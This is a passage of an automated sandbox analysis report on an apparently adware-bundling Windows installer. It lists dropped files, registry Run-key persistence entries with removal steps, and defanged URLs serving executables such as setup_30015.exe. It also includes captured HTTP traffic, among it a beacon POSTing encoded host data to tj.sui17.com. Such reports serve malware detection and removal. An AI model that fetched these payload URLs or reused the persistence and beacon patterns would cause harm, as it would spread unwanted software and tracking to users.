%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ren2[1].swf (28226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\btn[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg[1].swf (9621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ren1[1].swf (8159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\index[1].swf (1254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\2[1].js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dot[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1222[1].htm (1 bytes)
C:\copy%original file name%.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\29041[1].htm (6445 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\z_stat[2].php (834 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ad[1].htm (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sound[1].swf (5199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g2[1].js (457 bytes)
%Program Files%\anote\Alarm.wav (13 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmF.tmp\nsisdl.dll (14 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\öÃâ€ÃƒËœ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp (35237 bytes)
%Program Files%\anote\anote.exe (35784 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[3].php (764 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@61.196.186[1].txt (212 bytes)
%Documents and Settings%\%current user%\FAVORITES (4 bytes)
%Program Files%\MESSENGER (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%Program Files%\Internet Explorer (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (1628 bytes)
%System%\Macromed\Flash (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\search_btn[1].png (534 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\61.196.186[1].htm (4 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (6593 bytes)
%WinDir%\Temp\Perflib_Perfdata_15c.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\do1[1].php (18641 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
C:\$Directory (1660 bytes)
%Program Files%\Windows NT (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ico_here[1].gif (1 bytes)
C:\PROGRAM FILES (8 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%System%\config (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (47 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\base[1].css (1970 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012015072520150726\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tab2[1].png (2601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tab3[1].png (3190 bytes)
%Documents and Settings%\%current user%\AppData\Local\JiSuZhuShou\dwonJsMobile.dat (28 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\tab3.png (12 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\tab2.png (13 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\Fav9.dat (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\Down\ETagFile.dat (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[1].htm (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\btns[1].js (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tj[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].htm (8 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\edi.dat (709159 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\btns.js (376 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"fastsee" = "%Documents and Settings%\All Users\Application Data\201572519\deployPkg.exe /tlaclt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"EagleHealth368221555" = "%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NewEyeNurse.exe /deamon"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Y73ÖÖ×ÓËÑË÷ÉñÆ÷" = "%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73Server.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"JiSuZhuShou" = "%Program Files%\JiSuZhuShou\JSZS.exe /A" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
nsp0 | 4096 | 1830912 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
nsp1 | 1835008 | 618026 | 610816 | 5.53401 | 1825faa25c18988f8f4f68909a906556 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://all.cnzz.com.danuoyi.tbcache.com/z_stat.php?id=1255080332 | |
hxxp://download.juezhao123.com/setup/setup_30015.exe | 58.222.20.238 |
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1255080332&t=z | |
hxxp://oz.cnzz.com/stat.htm?id=1255080332&r=&lg=en-us&ntime=none&cnzz_eid=1909991955-1437851425-&showp=1916x902&t=&h=1&rnd=1737086510 | 198.11.132.200 |
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=1346578631 | 42.120.219.171 |
hxxp://cnzz.mmstat.com/app.gif?&cna=9c06DvdL 1kCASU5EL1qJWYh | 42.120.219.171 |
hxxp://all.cnzz.com.danuoyi.tbcache.com/z_stat.php?id=1255080411 | |
hxxp://jc.110160.com/ad.htm | 58.218.211.12 |
hxxp://tj.sui17.com/paramfile/desktoplnk.txt | 58.218.199.2 |
hxxp://p.xihawan8.com/s/1/1222/29041.html?uid=907191& | |
hxxp://oz.cnzz.com/stat.htm?id=1255080411&r=&lg=en-us&ntime=none&cnzz_eid=308424489-1437851639-&showp=1916x902&t=&h=1&rnd=1536579831 | 198.11.132.200 |
hxxp://tj.sui17.com/ParamFile/icos/20150713013721.ico | 58.218.199.2 |
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1255080411&t=z | |
hxxp://js.users.51.la/17745949.js | 222.187.225.125 |
hxxp://tj.sui17.com/ParamFile/icos/20150713014932.ico | 58.218.199.2 |
hxxp://s.click.gds.taobao.com/t?e=m=2&s=35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds+V2hm/dhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA/DpPH01wK9AmARIwX9K+AjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV | |
hxxp://tj.sui17.com/detail.ashx | 58.218.199.2 |
hxxp://p.xihawan8.com/api/c.php?platform_id=1&union_id=1222&union_type=7&link_id=29041 | |
hxxp://s.click.gds.taobao.com/t_js?tu=http://s.click.taobao.com/t?e=m%3D2%26s%3D35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds%2BV2hm%2FdhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA%2FDpPH01wK9AmARIwX9K%2BAjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S%2FhJ%2FRvF2FLeaGX7Mz%2BM | |
hxxp://opt.xdwscache.glb0.lxdns.com/html/click/7191_653.html | |
hxxp://p.xihawan8.com/js/1/g2.js?0.8342408241674127 | |
hxxp://tj.sui17.com/ParamFile/icos/20150713015122.ico | 58.218.199.2 |
hxxp://p.xihawan8.com/s/1/1222/ | |
hxxp://s.click.gds.taobao.com/t?e=m=2&s=35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds+V2hm/dhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA/DpPH01wK9AmARIwX9K+AjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S/hJ/RvF2FLeaGX7Mz+M | |
hxxp://down.sushouspell.com/sushou/sw/-2100_1_ss.exe | 220.167.104.226 |
hxxp://download.juezhao123.com/img/30015.jpg?t=141611 | 58.222.20.238 |
hxxp://opt.xdwscache.glb0.lxdns.com/swfs/85/26497cqjd1420150506/index.swf | |
hxxp://opt.xdwscache.glb0.lxdns.com/swfs/85/26497cqjd1420150506/btn.gif | |
hxxp://wagbridge.gds.taobao.com/?ali_trackid=2:mm_28882711_2549618_31192338:1437851643_2k3_1682349860 | |
hxxp://opt.xdwscache.glb0.lxdns.com/swfs/85/26497cqjd1420150506/bg.swf | |
hxxp://opt.xdwscache.glb0.lxdns.com/swfs/85/26497cqjd1420150506/ren1.swf | |
hxxp://opt.xdwscache.glb0.lxdns.com/swfs/85/26497cqjd1420150506/ren2.swf | |
hxxp://cp.gs307.com/f/track.php?step=2 | 14.18.238.188 |
hxxp://opt.xdwscache.glb0.lxdns.com/swfs/85/26497cqjd1420150506/sound.swf | |
hxxp://opt.xdwscache.glb0.lxdns.com/swfs/85/26497cqjd1420150506/reg.swf | |
hxxp://opt.xdwscache.glb0.lxdns.com/img/click/dot.gif | |
hxxp://p.xihawan8.com/s/1/1222/29041/5.js?uid=907191<=2188&key=3&tid=1&0.7401772076644835 | |
hxxp://p.xihawan8.com/b/1/1377/gdd9fid.swf?uid=507191 | |
hxxp://p.xihawan8.com/s/1/1222/29041/2.js?uid=907191<=2500&key=3&tid=2&0.28468476743951643 | |
hxxp://cp.gs307.com/f/track.php?step=2&ext= | 14.18.238.188 |
hxxp://opt.xdwscache.glb0.lxdns.com/js/shunfeiCL.js | |
hxxp://status.login.37.com/api/login.php?action=status&game_id=275&server_id=57729&callback=_loginCheck&tid=3&0.8873691666707852 | 121.201.25.98 |
hxxp://hpcc-page.cnc.ccgslb.com.cn/js/vc.min.js | |
hxxp://web.fx.sushouspell.com/btns/btns.js | 222.88.93.120 |
hxxp://image.anbangjiance.com/play/fxappimg/btn/tab3.png | 60.221.255.11 |
hxxp://image.anbangjiance.com/play/fxappimg/btn/tab2.png | 60.221.255.11 |
hxxp://image.anbangjiance.com/happy/tb.ico | 60.221.255.11 |
hxxp://update.zchon.net.w.kunlunar.com/files/069.exe | 106.120.181.40 |
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=1254485011 | |
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1254485011&t=z | |
hxxp://oz.cnzz.com/stat.htm?id=1254485011&r=&lg=en-us&ntime=none&cnzz_eid=1465502878-1437851671-&showp=1916x902&t=Y73ç§åæœç´¢ç¥žå™¨&h=1&rnd=1427650920 | 198.11.132.200 |
hxxp://json.app.sushouspell.com/app/json/advstyle/9.js | 125.43.78.109 |
hxxp://update.zchon.net.w.kunlunar.com/setup/update.zip | 106.120.181.40 |
hxxp://update.zchon.net/files/069.exe | 106.120.181.40 |
hxxp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/reg.swf | 203.130.61.92 |
hxxp://s.click.taobao.com/t?e=m=2&s=35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds+V2hm/dhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA/DpPH01wK9AmARIwX9K+AjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV | 140.205.243.67 |
hxxp://c.cnzz.com/core.php?web_id=1255080332&t=z | 213.244.178.248 |
hxxp://kwcdn.000dn.com/js/shunfeiCL.js | 203.130.61.92 |
hxxp://pcookie.cnzz.com/app.gif?&cna=9c06DvdL 1kCASU5EL1qJWYh | 42.120.219.171 |
hxxp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/ren2.swf | 203.130.61.92 |
hxxp://image.juezhao123.com/img/30015.jpg?t=141611 | 58.222.20.238 |
hxxp://ju.taobao.com/?ali_trackid=2:mm_28882711_2549618_31192338:1437851643_2k3_1682349860 | 140.205.115.1 |
hxxp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/sound.swf | 203.130.61.92 |
hxxp://p.5mnh.com/js/1/g2.js?0.8342408241674127 | 115.231.95.107 |
hxxp://tb.mulcent.com/happy/tb.ico | 60.221.255.11 |
hxxp://c.cnzz.com/core.php?web_id=1254485011&t=z | 213.244.178.248 |
hxxp://p.5mnh.com/s/1/1222/ | 115.231.95.107 |
hxxp://c.cnzz.com/core.php?web_id=1255080411&t=z | 213.244.178.248 |
hxxp://p.5mnh.com/api/c.php?platform_id=1&union_id=1222&union_type=7&link_id=29041 | 115.231.95.107 |
hxxp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/ren1.swf | 203.130.61.92 |
hxxp://s.click.taobao.com/t?e=m=2&s=35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds+V2hm/dhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA/DpPH01wK9AmARIwX9K+AjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S/hJ/RvF2FLeaGX7Mz+M | 140.205.243.67 |
hxxp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/bg.swf | 203.130.61.92 |
hxxp://s95.cnzz.com/z_stat.php?id=1255080332 | 1.99.192.16 |
hxxp://c.tb1u.com/b/1/1377/gdd9fid.swf?uid=507191 | 116.10.189.226 |
hxxp://p.5mnh.com/s/1/1222/29041/2.js?uid=907191<=2500&key=3&tid=2&0.28468476743951643 | 115.231.95.107 |
hxxp://update.zchon.net/setup/update.zip | 106.120.181.40 |
hxxp://stuff.cdn.biddingx.com/js/vc.min.js | 112.90.148.14 |
hxxp://s11.cnzz.com/stat.php?id=1254485011 | 1.99.192.16 |
hxxp://s4.cnzz.com/z_stat.php?id=1255080411 | 1.99.192.15 |
hxxp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/btn.gif | 203.130.61.92 |
hxxp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/index.swf | 203.130.61.92 |
hxxp://p.5mnh.com/s/1/1222/29041.html?uid=907191& | 115.231.95.107 |
hxxp://s.click.taobao.com/t_js?tu=http://s.click.taobao.com/t?e=m%3D2%26s%3D35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds%2BV2hm%2FdhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA%2FDpPH01wK9AmARIwX9K%2BAjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S%2FhJ%2FRvF2FLeaGX7Mz%2BM | 140.205.243.67 |
hxxp://www.feitian001.com/html/click/7191_653.html | 203.130.61.92 |
hxxp://img.feitian001.com/img/click/dot.gif | 203.130.61.92 |
hxxp://p.5mnh.com/s/1/1222/29041/5.js?uid=907191<=2188&key=3&tid=1&0.7401772076644835 | 115.231.95.107 |
tja.y73.com | 119.147.115.78 |
pcookie.taobao.com | 140.205.99.4 |
so.y73.com | 61.196.186.155 |
s.tbcdn.cn | 195.27.31.231 |
img.alicdn.com | 23.64.226.88 |
web.51.la | 113.107.43.72 |
skip.ju.taobao.com | 80.231.126.138 |
udt.sushouspell.com | 120.131.64.117 |
down.y73shop.com | 121.12.118.7 |
dl.tiexuejs.com | 122.225.99.231 |
gtms02.alicdn.com | 195.59.70.240 |
ou.sushouspell.com | 125.43.78.118 |
idca.y73.com | 121.12.175.51 |
g.alicdn.com | 188.254.86.250 |
gtms03.alicdn.com | 87.245.221.112 |
gtms01.alicdn.com | 87.245.221.90 |
at.alicdn.com | 195.27.31.240 |
ftt.sushouspell.com | 120.131.64.116 |
log.mmstat.com | 140.205.248.86 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /17745949.js HTTP/1.1
Accept: */*
Referer: hXXp://jc.110160.com/ad.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1861
Content-Type: application/x-javascript
Last-Modified: Mon, 20 Jul 2015 08:46:24 GMT
Accept-Ranges: bytes
ETag: "2a7378fc8c2d01:208e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:14:01 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?17745949" target="_blank" title="51.La 网站流量统计系统">网站统计</a>\n');..var a5949tf="51la";var a5949pu="";var a5949pf="51la";var a5949su=window.location;var a5949sf=document.referrer;var a5949of="";var a5949op="";var a5949ops=1;var a5949ot=1;var a5949d=new Date();var a5949color="";if (navigator.appName=="Netscape"){a5949color=screen.pixelDepth;} else {a5949color=screen.colorDepth;}..try{a5949tf=top.document.referrer;}catch(e){}..try{a5949pu =window.parent.location;}catch(e){}..try{a5949pf=window.parent.document.referrer;}catch(e){}..try{a5949ops=document.cookie.match(new RegExp("(^| )a5949_pages=([^;]*)(;|$)"));a5949ops=(a5949ops==null)?1: (parseInt(unescape((a5949ops)[2])) 1);var a5949oe =new Date();a5949oe.setTime(a5949oe.getTime() 60*60*1000);document.cookie="a5949_pages=" a5949ops ";path=/;expires=" a5949oe.toGMTString();a5949ot=document.cookie.match(new RegExp("(^| )a5949_times=([^;]*)(;|$)"));if(a5949ot==null){a5949ot=1;}else{a5949ot=parseInt(unescape((a5949ot)[2])); a5949ot=(a5949ops==1)?(a5949ot 1):(a5949ot);}a5949oe.setTime(a5949oe.getTime() 365*24*60*60*1000);document.cookie="a5949_times=" a5949ot ";path=/;expires=" a5949oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a5949ops=-1;a5949ot=-1;}}catch(e){}..a5949of=a5949sf;if(a5949pf!=="51la"){a5949of=a5949pf;}if(a5949tf!=="51la"){a5949of=a5949tf;}a5949op=a5949pu;try{lainframe}catch(e){a5949op=a5949su;}..a5949src=
<<< skipped >>>
GET /ParamFile/icos/20150713015122.ico HTTP/1.1
Connection: close
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Content-Length: 33542
Content-Type: image/x-icon
Last-Modified: Mon, 13 Jul 2015 05:51:22 GMT
Accept-Ranges: bytes
ETag: "0294df22fbdd01:6a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:15:56 GMT
Connection: close
......ZZ.... .........(...Z......... ......~....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
POST /detail.ashx HTTP/1.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
content=3239383031333534343933343B313B
HTTP/1.1 200 OK
Connection: close
Date: Sat, 25 Jul 2015 19:16:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
ok..
GET /s/1/1222/29041.html?uid=907191& HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.5mnh.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 25 Jul 2015 19:13:59 GMT
Content-Type: text/html
Content-Length: 24029
Connection: keep-alive
Last-Modified: Tue, 21 Jul 2015 03:43:44 GMT
ETag: "55adbff0-5ddd"
Accept-Ranges: bytes
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN".. "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>..<title></title>..<style type="text/css">.. body {.. background-color: #000;.. font-size: 12px;.. margin: 0;.. }.. td img {.. display: block;.. }.. input {.. width: 150px;.. height: 16px;.. }.. /**.. * ........ */.. .qp #main {.. width: auto;.. margin: 0 auto;.. }.. .qp #show {.. position: absolute;.. top: 230px;.. left: 50%;.. margin-left: -270px;.. padding-left:20px;.. width: 480px;.. height: 400px;.. }.. .qp #tr_olduser_notice{.. display:none;.. color:red;.. padding-left:45px;.. }.. .qp #register_form{.. width: auto;.. }.. /**.. * FL.. */.. .fl #main {.. width: auto;.. margin: 0 auto;.. }.. /**.. * ........ */.. .pp #register_form{.. width: 480px;.. }.. .pp #tr_olduser_notice{.. display:none;.. color:red;.. padding-left:45px;.. }.. .pp #main {.. width: 1024px;.. margin: 0 auto;.. }.. .pp #show {.. position: relative;.. top: 230px;.. left: -270px;.. width: 480px;.. height: 400px;.. }.. .pp #fl
<<< skipped >>>
GET /js/1/g2.js?0.8342408241674127 HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.5mnh.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 25 Jul 2015 19:14:02 GMT
Content-Type: application/x-javascript
Content-Length: 6126
Last-Modified: Thu, 09 Apr 2015 05:23:16 GMT
Connection: keep-alive
ETag: "55260cc4-17ee"
Accept-Ranges: bytes
var _agreement_string = '<td height="10" colspan="3" align="left"><input type="checkbox" checked="checked" value="checkbox" id="checkservice" name="checkservice" style="margin-left:94px;height:13px;width:13px;"><a target="_blank" id="agreement" href="/service_' platformDeploy '.html" style="text-decoration:none;color:black;">......................................................</a></td>';.var _SET_37={'agreement':{'status':1,'str':_agreement_string}};.function _loginCheck(a){oldusername=a}function setLoginAccount(){var a=document.getElementById("login_account");var b=document.getElementById("divolduser");var f=document.getElementById("main");a&&(a.value=="")&&(a.value=oldusername)}function loadOther(){if(oldusername!=""){setLoginAccount()}else{if(gconfig.status_login_domain!=""){Jsonp("hXXp://" gconfig.status_login_domain "/api/login.php?action=status&game_id=" gameId "&server_id=" gameServerId "&callback=_loginCheck",null);if(oldusername!=""){setLoginAccount()}}}try{if(gconfig.union_type==7){var a=document.createElement("script");a.id="sf";a.src="hXXp://kwcdn.000dn.com/js/shunfeiCL.js";document.getElementsByTagName("head")[0].appendChild(a)}}catch(b){}};.var getVar=function(v){return eval('window.' v);};.var addEvtListener=function(c,b,a){if(document.addEventListener){if(c){c.addEventListener(b,a,false)}else{addEventListener(b,a,false)}}else{if(attachEvent){if(c){c.attachEvent("on" b,a)}else{attachEvent("on" b,a)}}}};var catchClickHeat=function(o){var o=o||window.event;var _obj=o
<<< skipped >>>
GET /s/1/1222/29041/5.js?uid=907191<=2188&key=3&tid=1&0.7401772076644835 HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.5mnh.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 25 Jul 2015 19:14:04 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
a..//success...0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Date: Sat, 25 Jul 2015 19:14:04 GMT..Content-Type: application/x-javascript..Transfer-Encoding: chunked..Connection: keep-alive..a..//success...0..
GET /t_js?tu=http://s.click.taobao.com/t?e=m%3D2%26s%3D35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds%2BV2hm%2FdhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA%2FDpPH01wK9AmARIwX9K%2BAjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S%2FhJ%2FRvF2FLeaGX7Mz%2BM HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.click.taobao.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 25 Jul 2015 19:14:02 GMT
Content-Type: text/html; charset=GBK
Transfer-Encoding: chunked
Connection: close
Last-Modified: Thu, 16 Jul 2015 07:47:38 GMT
Vary: Accept-Encoding
Expires: Sat, 25 Jul 2015 19:14:02 GMT
Cache-Control: max-age=0
Content-Encoding: gzip
Via: rsfk13378.et2[web,200]
